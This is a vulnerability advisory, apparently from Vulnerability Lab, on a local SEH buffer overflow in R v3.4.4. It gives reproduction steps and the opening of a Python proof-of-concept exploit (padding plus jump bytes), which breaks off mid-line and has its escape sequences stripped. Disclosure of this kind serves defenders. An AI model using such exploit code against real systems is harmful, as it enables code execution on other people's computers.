Document Title: =============== R v3.4.4 Software - (SEH) Buffer Overflow Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2143 Release Date: ============= 2018-08-26 Vulnerability Laboratory ID (VL-ID): ==================================== 2143 Common Vulnerability Scoring System: ==================================== 6.5 Vulnerability Class: ==================== Buffer Overflow Current Estimated Price: ======================== 2.000€ - 3.000€ Product & Service Introduction: =============================== R is a language and environment for statistical computing and graphics. It is a GNU project which is similar to the S language and environment which was developed at Bell Laboratories (formerly AT&T, now Lucent Technologies) by John Chambers and colleagues. R can be considered as a different implementation of S. There are some important differences, but much code written for S runs unaltered under R. R is available as Free Software under the terms of the Free Software Foundation’s GNU General Public License in source code form. It compiles and runs on a wide variety of UNIX platforms and similar systems (including FreeBSD and Linux), Windows and MacOS. (Copy of the Homepage: https://www.r-project.org/about.html ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a buffer overflow vulnerability in the official R v3.4.4 software. Vulnerability Disclosure Timeline: ================================== 2018-08-27: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== R Project Product: R - Software (Windows & MacOS) 3.4.4 Exploitation Technique: ======================= Local Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= No User Interaction Disclosure Type: ================ Full Disclosure Technical Details & Description: ================================ A local buffer overflow vulnerability has been discovered in the official R v3.4.4 software. The vulnerability allows local attackers to overwrite the registers (example eip) to compromise the local software process. The issue can be exploited by local attackers with system privileges to compromise the affected local computer system. The vulnerability is marked as classic buffer overflow issue. Proof of Concept (PoC): ======================= The local buffer overflow vulnerability can be exploited by local attackers without user interaction and with system privileges. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability: under GUI preferences paste bo.txt contents into 'Language for menus and messages' click ok --> Now the calculator executes! --- PoC (Exploit) --- #--------------------------------------------------------# #Exploit Title: R v3.4.4 - (SEH) Buffer Overflow Exploit #Exploit Author : ZwX #Exploit Date: 2018-08-22 #Vendor Homepage : https://www.r-project.org/ #Tested on OS: Windows 7 #Social: twitter.com/ZwX2a #contact: msk4@live.fr #Website: http://zwx-pentester.fr/ #--------------------------------------------------------# #!/usr/bin/python from struct import pack buffer = "x41" * 900 a = "xebx14x90x90" b = pack("